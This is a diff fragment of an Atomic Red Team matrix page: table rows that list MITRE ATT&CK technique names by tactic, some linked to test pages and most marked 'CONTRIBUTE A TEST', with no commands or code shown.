-| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Screen Capture](../../T1113/T1113.md) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Time Discovery](../../T1124/T1124.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1551.004/T1551.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1551/T1551.md) | | | | | | | |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Network Share Connection Removal](../../T1551.005/T1551.005.md) | | | | | | | |
-| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Startup Items](../../T1037.005/T1037.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Trap](../../T1546.005/T1546.005.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Startup Items](../../T1037.005/T1037.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Process Injection](../../T1055/T1055.md) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Service](../../T1543.003/T1543.003.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
-| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
-| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
